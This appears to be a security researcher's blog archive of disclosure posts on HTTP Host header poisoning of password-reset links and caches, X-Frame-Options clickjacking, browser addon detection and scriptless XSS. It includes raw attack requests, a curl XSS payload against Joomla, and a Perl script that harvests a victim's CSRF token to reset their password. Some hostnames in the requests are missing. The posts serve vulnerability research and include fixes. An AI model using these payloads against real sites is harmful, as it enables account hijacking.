Wednesday, 18 February 2015

Exploiting Path Relative Style-Sheet Imports (PRSSI)

I've posted a detailed breakdown of how to succesfully exploit path-relative stylesheet imports and navigate the associated pitfalls over at


Saturday, 30 August 2014

Comma Separated Vulnerabilities

My latest research, on exploiting spreadsheet-export functionality to attack users via malicious formulae, is over at:

Please note I no longer work at Context.

Wednesday, 1 May 2013

Practical HTTP Host header attacks

    Password reset and web-cache poisoning

        (And a little surprise in RFC-2616)


How does a deployable web-application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to:
     <link href="http://_SERVER['HOST']"    (Joomla)

...and append secret keys and tokens to links containing it:
    <a href="http://_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)

....and even directly import scripts from it:
      <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

    There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning; manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers.

Password reset poisoning

    Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key:

Places it in a link to the site:

and emails to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account.

The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header:
> POST /password/reset HTTP/1.1
> Host:
> ...
> csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin

    This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part.

Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination.

In other cases, the Host may be URL-decoded and placed directly into the email header allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: followed by an attachment engineered to trigger a bounce, like a zip bomb.

Cache poisoning

Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Beuno in 2008. 5 years later there's no shortage of sites implicitly trusting the host header so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource:

> GET /index.html HTTP/1.1       > GET /index.html HTTP/1.1
> Host:              > Host:

So, to persuade a cache to serve our poisoned response to someone else we need to create a disconnect between the host header the cache sees, and the host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first host header it sees to identify the request, but Apache concatenates all host headers present and Nginx uses the last host header[1]. This means that you can poison a Varnish cache with URLs pointing at by making the following request:
> GET / HTTP/1.1
> Host:
> Host:
Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as:
curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" | fgrep cow\"

This will create the following request:
> GET / HTTP/1.1
> Host: cow"onerror='alert(1)'rel='stylesheet'

The response should show a poisoned <link> element:
<link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/>
To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup.

'Secured' configurations

    So far I've assumed that you can make a HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple.

Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. As such, it's possible to pass requests with arbitrary host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising that users create a dummy default-vhost to act as a catchall for requests with unexpected Host headers, ensuring that Django applications never got passed requests with unexpected Host headers.

The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update, which I discovered in April 2012 with the following request:
> POST /en-US/firefox/user/pwreset HTTP/1.1> Host:
> X-Forwarded-Host:

Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful syntax:
> POST /en-US/firefox/user/pwreset HTTP/1.1> Host:

This resulted in the following (admittedly suspicious) password reset link:

If you click it, you'll notice that your browser sends the key to before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it:

Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links:

> POST /en-US/firefox/users/pwreset HTTP/1.1
> Host:
Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely.  However, the arguably ultimate authority on virtual hosting, RFC2616, has the following to say:

5.2 The Resource Identified by a Request
If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored.

The result? On Apache and Nginx  (and all compliant servers) it's possible to route requests with arbitrary host headers to any application present by using an absolute URI:
> Host:
This request results in a SERVER_NAME of but a HTTP['HOST'] of Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information of the difference between these two variables.  Django fixed this in February 2013 by enforcing a whitelist of allowed hosts. See the documentation for more details. However, these attack techniques still work fine on many other web applications.

Securing servers

Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible.

A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file:
        import std;

        sub vcl_recv {

Securing applications

Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient solution, is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration.

Further research

  • More effective / less inconvenient fixes
  • Automated detection
  • Exploiting wildcard whitelists with XSS & window.history
  • Exploiting multipart password reset emails by predicting boundaries
  • Better cache fuzzing (trailing Host headers?)

Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches.

For a discussion of automated detection of this issue, and a demo of web-cache poisoning against Typo3,  see the following video from OWASP AppSec EU: ActiveScan++: Augmenting manual testing with attack proxy plugins.

Feel free to drop a comment, email or DM me if you have any observations or queries.

Saturday, 2 June 2012

X-Frame-Options gotcha

Summary: X-Frame-Options: SAMEORIGIN validates not window.parent. This is bad news for sites that frame untrusted content.

UI-Redressing or 'Clickjacking'  attacks rely on loading the target page in an iframe. The standard defence against them is to deny framing by using the X-Frame-Options (XFO) server header. Unfortunately there is a slight quirk in this feature's implementation which has left some sites vulnerable to clickjacking in spite of their use of XFO.

The problem is with the SAMEORIGIN flag. Intuitively, it sounds like it means 'Only pages from the same origin can frame this'. What it actually means is 'This page can only be framed when is of the same origin'. window.parent does not have to be of the same origin. This is significant if your website frames untrusted/external pages. Let's use an example: uses X-Frame-Options: SAMEORIGIN to protect itself. It also loads a page in a sandboxed iframe. tries to perform a clickjacking attack but is thwarted by the XFO header. Web browsers will see the flag refuse to load the iframe, so clicking the green circle will have no effect.

However, if the target site can be cajoled into iframing the attack page, we have a problem:

The fix is simple: if you must iframe untrusted content, use the DENY flag instead of SAMEORIGIN

Update: see clickjacking google for a couple of real attacks using this technique.

Tuesday, 20 December 2011

Phrack ebook

I've converted all 25 years of Phrack magazine into an ebook suitable for viewing on e-readers: (Kindles)

phrack.epub (Other e-readers)

The conversion wasn't perfect; text and code are fine but some of the ascii diagrams have been horribly mangled. I outright stripped base64-encoded tgz/png. This is a work in progess; I will update it whenever I feel like some heart-withering text-processing.

If you would like to roll your own version, download the epub generation code or the mobi version. They should run on all *nix distros with the requisite Perl modules. Both versions actually generate epubs, but the second can be easily converted into a .mobi using Kindlegen.

Redistributed with permission. Rights remain with

update #1: I have manually added issue 68 to the download. The generation code should work once Phrack updates p68.tar.gz

update #2: Fixed a zip layout mistake that broke compatibility with Stanza

update #3: eridius restructured the .epub so it should genuinely work in all e-readers now.

Friday, 1 July 2011

Sparse Bruteforce Addon Detection

This post demonstrates a technique for discovering which browser addons/extensions people who visit your website have installed. This could be used for fingerprinting, compatibility purposes or pre-exploit reconnaissance.

Chrome demo (Detects top 1000 extensions)
Backing script

Firefox demo(Detects ~10% of top 1000 addons)
Backing script

Both demos use the well known technique of:
<img/script src='chrome://[imageFromAddon]' onload='addonExists=true' onerror='addonExists=false'>

The Firefox demo was generated using a python script that inspects the chrome.manifest of each addon for 'contentaccessible=yes', then loads the addon's install.rdf and extracts the chrome:// URI of the addon's icon. The Chrome script is extremely simple; it merely detects the manifest.json that all Chrome extensions have. Both scripts can also be used to generate detection code for addons by search keyword.

Update: For a technical explanation & more elegant implementation see

Update #2: Firefox addons can also be detected without javascript; see
The poc on that page longer works, here's one that does:

Saturday, 28 May 2011

JS-less XSS

Using HTML Injection to hijack accounts without JavaScript.
Sometimes using javascript isn't an option. Maybe the target website uses the new Content Security Policy (CSP) header to prevent script execution, or perhaps the target user has NoScript. At the moment CSP is extremely rare (only used by mobile Twitter and only supported by Firefox 4) but it may become widespread in the future. After all, with CSP "the bar for a successful attack is placed much, much higher" ;) The techniques here are not a CSP bypass, but a workaround.

Since I couldn't find an XSS in mobile twitter in 5 minutes, I've hashed together a couple of extremely simple demo pages that use CSP and are vulnerable to XSS. See if you can work out how to make a payload to hijack an account. If you aren't using FF4 just try to write a scriptless payload.

Example Site One------------------Exploit via IMG
This exploit is quite stealthy; unless you intercept your browser's requests, you might not realise the password has been changed. The injected unclosed IMG tag results in the victim's browser making a request like GET[theEntirePageAfterTheInjectionPoint] extracts the 'csrftoken' value from the GET request, and places it into a 302 Found response like:

302 Found

So your browser dutifully performs
And that's it; the page will see the correct token and update the password.

The code behind is very simple:

use CGI ':standard';

my $tok = param('s');
if($tok =~ m/csrftoken.*value="([0-9]*)/) { $tok = $1; } #extract the token
my $ref = $ENV{HTTP_REFERER}; #get the referer
$ref =~ s/\?.*//g; #remove any arguments from the referer
print header(-Status=>'302 Found', -Location=>$ref.'?pass1=evilpassword&pass2=evilpassword&csrftoken='.$tok);

If the request you want to forge is POST only, try <iframe src=' to grab the token instead, and put an autosubmitting form in the iframe'd page.
Example Site Two------------------Exploit via FORM/TEXTBOX
This exploit is a lot less subtle. It requires user interaction, and triggers NoScript's XSS filter. However, the <form> <textbox> approach is much more likely to capture the whole web page, and won't be upset by a single ' or ".

The demo doesn't show it, but a token harvested from one page can often be used for any form on the website, and re-used indefinitely. Thus, just like with normal XSS, the injection doesn't have to be on the page with the form you want to forge. Another interesting alternative to harvesting tokens is UI-redressing attacks like clickjacking, since many anti-framing techniques allow framing when the host domain matches the framed domain.

Finally, I'm sure there are plenty more entertaining and robust ways of hijacking accounts without javascript/flash/java. I'll try to keep this page updated with the latest.

See also:
Sniffing saved passwords (still works):